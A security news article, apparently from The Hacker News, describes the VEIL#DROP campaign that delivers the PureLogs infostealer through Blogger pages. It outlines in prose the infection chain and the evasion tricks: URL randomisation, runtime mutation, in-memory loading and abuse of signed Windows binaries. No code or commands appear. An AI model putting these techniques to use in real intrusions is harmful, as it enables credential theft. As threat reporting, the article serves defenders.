How the Attack Chain Works
Security researchers have uncovered a sophisticated multi-stage malware delivery campaign, designated VEIL#DROP, that leverages Google’s Blogger platform to distribute the PureLogs information stealer. The infection chain begins when a user is tricked into executing a JavaScript file masquerading as a document, often delivered through spear-phishing emails or compromised websites.
Once executed, the JavaScript launches PowerShell with execution policy bypasses enabled. This PowerShell script then retrieves a next-stage payload hosted on a Blogger page, allowing attackers to bypass reputation-based defenses by abusing Google’s trusted infrastructure. The malware creates the illusion of a PDF document opening while silently proceeding with the infection in the background.
Evasion Tactics and Payload Execution
The VEIL#DROP framework employs several advanced evasion techniques. It dynamically generates unique Blogspot URLs for each execution by inserting random numbers of forward slashes to evade static URL signatures and filtering mechanisms. The script also introduces runtime mutation by replacing placeholder values with randomly generated strings during execution, defeating signature-based detection.
The final payload, PureLogs Stealer, is a .NET based infostealer that harvests sensitive data from compromised systems. The malware executes entirely in memory without leaving disk artifacts, using reflective code loading techniques. If direct memory execution is blocked, it falls back on Microsoft signed binaries like regsvcs.exe and msbuild.exe to accomplish its goals while appearing legitimate.
Impact and Scope
The impact of a PureLogs infection extends beyond the initial endpoint compromise. Harvested credentials and sensitive data can enable attackers to establish persistence, move laterally within networks, and potentially breach cloud infrastructure. The combination of trusted cloud service abuse, fileless execution, and living off the land binary abuse demonstrates a deliberate effort to evade traditional security controls and maintain operational stealth throughout the infection lifecycle.
Source: The Hacker News

